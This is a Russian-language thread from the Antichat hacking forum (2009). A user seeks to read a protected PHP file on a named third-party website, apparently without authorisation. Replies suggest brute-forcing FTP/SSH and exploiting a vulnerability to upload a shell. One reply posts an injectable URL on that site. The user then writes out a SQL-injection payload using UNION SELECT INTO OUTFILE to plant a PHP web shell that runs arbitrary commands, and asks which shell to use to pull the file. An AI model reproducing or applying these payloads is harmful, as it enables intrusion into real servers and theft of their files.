Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Помогите достать файл (https://forum.antichat.xyz/showthread.php?t=135970)

serg-php 19.08.2009 15:01
Помогите достать файл
 
Привет всем!

Столкнулся с проблемой чтения содержимого .php файла!


_http://www.myvm3.com/modules/Editors/

Файл hw_user.php

Какие будут соображения?

L I G A 19.08.2009 15:16
обычно если права не стоят на чтение то сообщение не такое ,а 403 форбидден.
скорее это скрипт выдает
знаешь так делают:
index.php: <?php define('inside', True);
library.php: <?php if (! defined('inside')) die('Access denied');
что бы не вызывались файлы напрямую.

serg-php 19.08.2009 19:32
А вообще, как прочитать содержимое ентого файла?

POS_troi 19.08.2009 19:37
Искать уязвимость и заливать шелл

сбрутить пароль ФТП/ССШ

а на прямую тебе сервер не отдаст содержимое PHP файла

L I G A 19.08.2009 19:55
Код:
http://www.myvm3.com/index.php?page=search&s_res=OR&q=&cid=2142&sub_cid=1'

serg-php 19.08.2009 22:52
Цитата:
сбрутить пароль ФТП/ССШ
- нонсенс! После 5 неправильных попыток, хостер блокирует ip.

serg-php 19.08.2009 22:53
Цитата:
http://www.myvm3.com/index.php?page=search&s_res=OR&q=&cid=2142&sub_cid =1'
Видимо, sql-inj! Попытаться через инклуд, что ли?

serg-php 19.08.2009 22:54
Цитата:
а на прямую тебе сервер не отдаст содержимое PHP файла
Типа уронить пхп-интерпретор!

L I G A 19.08.2009 23:06
Цитата:
Сообщение от serg-php
Попытаться через инклуд, что ли?
для начала попытаться подобрать количество полей.

serg-php 19.08.2009 23:10
ec3_category

имеет такую структуру!

id mediumint(8) unsigned NOT NULL auto_increment,
name varchar(100) NOT NULL,
pid mediumint(8) unsigned NOT NULL,
fset varchar(255) NOT NULL,
weight smallint(5) unsigned NOT NULL,
image varchar(255) NOT NULL,
se_url varchar(255) NOT NULL,
descr text NOT NULL,
meta_k text NOT NULL,
meta_d text NOT NULL,
PRIMARY KEY (id),
KEY pid (pid),
KEY fset (fset),
KEY name ( name(5) )

serg-php 19.08.2009 23:14
L I G A,

ты это миел ввиду?

_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*

L I G A 19.08.2009 23:34
Цитата:
Сообщение от serg-php
L I G A,

ты это миел ввиду?

_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*
я имел ввиду сначала подобрать количество полей,
в твоем запросе это количество "null'ов"
дальше будешь видеть что и как ,и мб сможешь залить простой шелл как ты продемонстрировал на своем примере.
и на будущее: для таких вопроов есть отдельная тема тыц

serg-php 19.08.2009 23:37
Цитата:
и на будущее: для таких вопроов есть отдельная тема тыц
Буду знать!

serg-php 19.08.2009 23:38
Кол-во полей в таблице известно - 14 я насчитал!

serg-php 19.08.2009 23:42
Какой шелл посоветуете, чтобы прочесть искомый файл или слить его локально?

L I G A 20.08.2009 00:01
Цитата:
Сообщение от serg-php
Кол-во полей в таблице известно - 14 я насчитал!
что то я сомневаюсь,я б для начала посаветовал тебе не пожалеть время а сесть и прочитать замечательную статью
Dr.Z3r0 о SQL INJECTION в разделе "наши статьи",если оно тебе действительно надо,а не надеятся на кого то.

serg-php 20.08.2009 00:28
Читаю, пробую применить примеры от http://forum.antichat.ru/thread43966.html

Видимо фильтруется!

serg-php 21.08.2009 16:26
Очень сложно делать что-то впервый раз! Пытаюсь использовать изнания из статьи - не получается!


Время: 11:26